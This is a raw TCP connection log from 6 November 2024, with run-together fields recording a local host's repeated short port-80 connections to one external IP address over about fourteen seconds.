                                                                                                                                                              Nov 6, 2024 17:40:37.351046085 CET8050348150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.351202965 CET5034880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.351250887 CET5034980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.351402044 CET5034980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.351450920 CET5034980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.539669037 CET8050349150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.539689064 CET8050349150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.606674910 CET8050349150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.619308949 CET5034980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.619872093 CET5035080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.807538033 CET8050349150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.807725906 CET5034980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.807945013 CET8050350150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.808175087 CET5035080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.808253050 CET5035080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.808253050 CET5035080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.999314070 CET8050350150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.999341965 CET8050350150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.067388058 CET8050350150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.077821970 CET5035080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.078417063 CET5035180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.267225981 CET8050351150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.267334938 CET8050350150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.267515898 CET5035180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.267560959 CET5035080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.267612934 CET5035180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.267612934 CET5035180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.469470978 CET8050351150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.469515085 CET8050351150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.521943092 CET8050351150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.534588099 CET5035180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.535038948 CET5035280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.723242998 CET8050351150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.723254919 CET8050352150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.723572969 CET5035180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.723575115 CET5035280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.723918915 CET5035280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.723918915 CET5035280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.911943913 CET8050352150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.912031889 CET8050352150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.983638048 CET8050352150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:38.995289087 CET5035280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:38.995832920 CET5035380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.187480927 CET8050352150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.187534094 CET8050353150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.187680006 CET5035280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.187743902 CET5035380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.187872887 CET5035380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.187872887 CET5035380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.378514051 CET8050353150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.378582954 CET8050353150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.445067883 CET8050353150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.457088947 CET5035380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.457539082 CET5035480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.653342009 CET8050354150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.653390884 CET8050353150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.653573036 CET5035480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.653618097 CET5035380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.653803110 CET5035480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.653803110 CET5035480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.842443943 CET8050354150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.842571974 CET8050354150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.911935091 CET8050354150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:39.923186064 CET5035480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:39.923630953 CET5035580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.116331100 CET8050354150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:40.116391897 CET8050355150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:40.116544962 CET5035480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.116611958 CET5035580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.116784096 CET5035580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.116784096 CET5035580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.305200100 CET8050355150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:40.305246115 CET8050355150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:40.374778032 CET8050355150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:40.388592005 CET5035580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.389183998 CET5035680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.581185102 CET8050355150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:40.581239939 CET8050356150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:40.581445932 CET5035580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.581451893 CET5035680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.581576109 CET5035680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.581633091 CET5035680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:40.774355888 CET8050356150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:40.774435997 CET8050356150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:41.841238022 CET8050356150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:41.852783918 CET5035680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:41.853662968 CET5035780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.040621996 CET8050356150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.040867090 CET5035680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.041587114 CET8050357150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.041845083 CET5035780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.042001009 CET5035780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.042001009 CET5035780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.229947090 CET8050357150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.230180025 CET8050357150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.313004017 CET8050357150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.325800896 CET5035780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.326498985 CET5035880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.515320063 CET8050358150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.515641928 CET5035880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.515703917 CET5035880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.515703917 CET5035880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.517734051 CET8050357150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.517855883 CET5035780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.706454992 CET8050358150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.706500053 CET8050358150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.773950100 CET8050358150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.789586067 CET5035880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.790185928 CET5035980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.978190899 CET8050358150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.978233099 CET8050359150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:42.978349924 CET5035880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.978507042 CET5035980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.978666067 CET5035980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:42.978666067 CET5035980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.170037031 CET8050359150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.170047045 CET8050359150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.237374067 CET8050359150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.254905939 CET5035980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.255805969 CET5036080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.443948030 CET8050360150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.444015980 CET8050359150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.444236994 CET5035980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.444257021 CET5036080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.444313049 CET5036080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.444313049 CET5036080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.632558107 CET8050360150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.632606030 CET8050360150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.704740047 CET8050360150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.718250036 CET5036080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.718748093 CET5036180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.906337976 CET8050360150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.906419039 CET8050361150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:43.906501055 CET5036080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.906575918 CET5036180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.907263041 CET5036180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:43.907263041 CET5036180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.095037937 CET8050361150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.095084906 CET8050361150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.167633057 CET8050361150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.180753946 CET5036180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.181370974 CET5036280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.370752096 CET8050361150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.370851040 CET8050362150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.370984077 CET5036180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.371020079 CET5036280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.371130943 CET5036280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.371130943 CET5036280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.558875084 CET8050362150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.558897018 CET8050362150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.631561041 CET8050362150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.645236015 CET5036280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.645663977 CET5036380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.835489988 CET8050362150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.835524082 CET8050363150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:44.835783958 CET5036280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.835834980 CET5036380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.836112022 CET5036380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:44.836112976 CET5036380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.024019003 CET8050363150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.024055004 CET8050363150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.093406916 CET8050363150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.113017082 CET5036380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.113473892 CET5036480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.300791025 CET8050363150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.300931931 CET5036380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.301042080 CET8050364150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.301220894 CET5036480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.301358938 CET5036480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.301358938 CET5036480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.488765001 CET8050364150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.488831043 CET8050364150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.558896065 CET8050364150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.572746992 CET5036480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.573199034 CET5036580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.760498047 CET8050364150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.760528088 CET8050365150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.760709047 CET5036580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.760709047 CET5036480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.760867119 CET5036580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.760867119 CET5036580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:45.948554039 CET8050365150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:45.948581934 CET8050365150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.012461901 CET8050365150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.023117065 CET5036580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.023844004 CET5036680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.210532904 CET8050365150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.210725069 CET5036580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.211462975 CET8050366150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.211625099 CET5036680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.211775064 CET5036680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.211775064 CET5036680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.399079084 CET8050366150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.399205923 CET8050366150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.472609997 CET8050366150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.490245104 CET5036680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.491015911 CET5036780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.679722071 CET8050366150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.679932117 CET5036680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.680893898 CET8050367150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.681062937 CET5036780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.681231022 CET5036780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.681231022 CET5036780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.869177103 CET8050367150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.869187117 CET8050367150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.934398890 CET8050367150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:46.948091984 CET5036780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:46.948508024 CET5036880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.135627985 CET8050368150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.135740042 CET8050367150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.135817051 CET5036880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.135867119 CET5036780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.135965109 CET5036880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.135965109 CET5036880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.323772907 CET8050368150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.323781013 CET8050368150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.395411968 CET8050368150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.411091089 CET5036880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.411861897 CET5036980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.598675966 CET8050368150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.598927021 CET5036880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.599824905 CET8050369150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.600054979 CET5036980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.600446939 CET5036980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.600446939 CET5036980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.788393974 CET8050369150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.788402081 CET8050369150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.863390923 CET8050369150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:47.874197960 CET5036980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:47.874623060 CET5037080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.068475962 CET8050370150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.068736076 CET5037080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.068804979 CET8050369150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.068864107 CET5037080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.068864107 CET5037080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.068972111 CET5036980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.256279945 CET8050370150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.256308079 CET8050370150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.323029041 CET8050370150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.338078976 CET5037080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.338547945 CET5037180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.525593042 CET8050370150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.525816917 CET5037080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.526232958 CET8050371150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.526387930 CET5037180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.526659012 CET5037180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.526659012 CET5037180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.714375973 CET8050371150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.716430902 CET8050371150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.801856995 CET8050371150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:48.816864014 CET5037180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:48.817322016 CET5037280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.005824089 CET8050371150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.005832911 CET8050372150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.006000042 CET5037180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.006030083 CET5037280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.006218910 CET5037280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.006220102 CET5037280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.194025040 CET8050372150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.194149971 CET8050372150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.276484966 CET8050372150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.293843985 CET5037280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.294300079 CET5037380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.481933117 CET8050372150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.482155085 CET5037280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.482158899 CET8050373150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.482558012 CET5037380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.482697010 CET5037380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.482697010 CET5037380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.671314001 CET8050373150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.671329975 CET8050373150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.742703915 CET8050373150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.753957987 CET5037380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.754386902 CET5037480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.942430019 CET8050374150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.942656994 CET8050373150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:49.942715883 CET5037480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.942811012 CET5037480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.942811012 CET5037480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:49.942840099 CET5037380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:50.130415916 CET8050374150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:50.130439997 CET8050374150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:50.972754002 CET8050374150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:50.984540939 CET5037480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:50.985080004 CET5037580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.172740936 CET8050374150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.172771931 CET8050375150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.172907114 CET5037480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.173044920 CET5037580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.173088074 CET5037580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.173135042 CET5037580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.361388922 CET8050375150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.361418009 CET8050375150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.444031000 CET8050375150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.460117102 CET5037580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.460771084 CET5037680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.648560047 CET8050375150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.648770094 CET5037580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:51.649019003 CET8050376150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:51.649260044 CET5037680192.168.11.20150.241.91.218
